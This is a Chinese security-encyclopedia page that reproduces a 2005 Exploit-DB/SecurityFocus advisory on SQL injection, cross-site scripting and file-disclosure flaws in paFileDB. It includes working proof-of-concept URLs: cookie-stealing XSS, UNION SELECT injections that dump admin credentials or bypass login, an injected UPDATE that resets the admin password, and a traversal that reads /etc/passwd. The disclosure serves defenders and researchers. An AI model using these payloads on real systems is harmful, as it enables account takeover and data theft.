PAFileDB 1.1.3/2.1.1/3.0/3.1 – Multiple Input Validation Vulnerabilities

PAFileDB 1.1.3/2.1.1/3.0/3.1 – Multiple Input Validation Vulnerabilities

漏洞ID 1055166 漏洞类型
发布时间 2005-06-15 更新时间 2005-06-15
图片[1]-PAFileDB 1.1.3/2.1.1/3.0/3.1 – Multiple Input Validation Vulnerabilities-安全小百科CVE编号 N/A
图片[2]-PAFileDB 1.1.3/2.1.1/3.0/3.1 – Multiple Input Validation Vulnerabilities-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25824
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/13967/info

paFileDB is prone to multiple input validation vulnerabilities. The following issues are reported:

Multiple SQL injection issues exist in paFileDB.

The impact of these issues will vary depending on features supported by the database implementation but may be limited due to the nature of affected queries.

Multiple cross-site scripting issues are also reported when passing user-supplied arguments to the 'sortby', 'filelist', and 'pages' parameters of the 'pafiledb.php' script.

Exploitation of these issues may allow for compromise of the software, session hijacking, or attacks against the underlying database.

Finally, paFileDB is prone to a file disclosure vulnerability. The 'action' parameter of the 'pafiledb.php' script is affected by the vulnerability. 

http://www.example.com/pafiledb.php?action=viewall&start=20&sortby=name%22
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://www.example.com/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
script%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://www.example.com/pafiledb.php?action=category&id=1&pages=%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://www.example.com/pafiledb.php?action=admin&login=do&formname=-99'%20UNION
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf0951522d9',
%20admin_email,%201%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
%3E%3E+Log+In+%3C%3C&action=admin&login=do

http://www.example.com/pafiledb.php?select=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
Category+%3C%3C&action=team&tm=category&category=edit&edit=form&menu1=%2F
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

http://www.example.com/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
=%2Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

http://www.example.com/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20MD5%281337%28%
20WHERE%201/*

http://www.example.com/pafiledb.php?action=../../../../etc/passwd%00&login=do

相关推荐: Digital Ultrix chroot提升特权漏洞

Digital Ultrix chroot提升特权漏洞 漏洞ID 1105236 漏洞类型 未知 发布时间 1991-05-01 更新时间 2005-05-02 CVE编号 CVE-1999-1194 CNNVD-ID CNNVD-199105-001 漏洞平…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享